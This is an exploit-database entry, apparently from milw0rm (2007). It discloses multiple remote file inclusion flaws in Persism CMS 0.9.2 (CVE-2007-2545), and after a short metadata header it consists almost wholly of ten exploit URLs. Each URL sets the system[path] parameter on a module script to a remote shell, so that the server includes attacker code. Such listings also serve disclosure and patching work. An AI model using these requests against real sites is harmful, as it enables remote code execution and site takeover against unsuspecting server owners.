[] NeoSense

Persism CMS 0.9.2 - system[path] Remote File Inclusion

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2007-05-03 
date_updated:  
verified: 1 
codes: OSVDB-37776;CVE-2007-2545;OSVDB-37775;OSVDB-37774;OSVDB-37773;OSVDB-37772;OSVDB-37771;OSVDB-37770;OSVDB-37769;OSVDB-37768;OSVDB-37767 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Persism Content Management System <= 0.9.2 Multiple Remote File Inclusion Vulnerabilities
# D.Script: http://www.persism.com/emil/0.9.2/0.9.2.tar.gz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/modules/blocks/headerfile.php?system[path]=Shell
# Exploit:[Path]/modules/files/blocks/latest_files.php?system[path]=Shell
# Exploit:[Path]/modules/filters/headerfile.php?system[path]=shell
# Exploit:[Path]/modules/forums/blocks/latest_posts.php?system[path]=shell
# Exploit:[Path]/modules/groups/headerfile.php?system[path]=shell
# Exploit:[Path]/modules/links/blocks/links.php?system[path]=shell
# Exploit:[Path]/modules/menu/headerfile.php?system[path]=shell
# Exploit:[Path]/modules/news/blocks/latest_news.php?system[path]=shell
# Exploit:[Path]/modules/settings/headerfile.php?system[path]=shell
# Exploit:[Path]/modules/users/headerfile.php?system[path]=shell
# Greetz To: Tryag-Team ....##

# milw0rm.com [2007-05-04]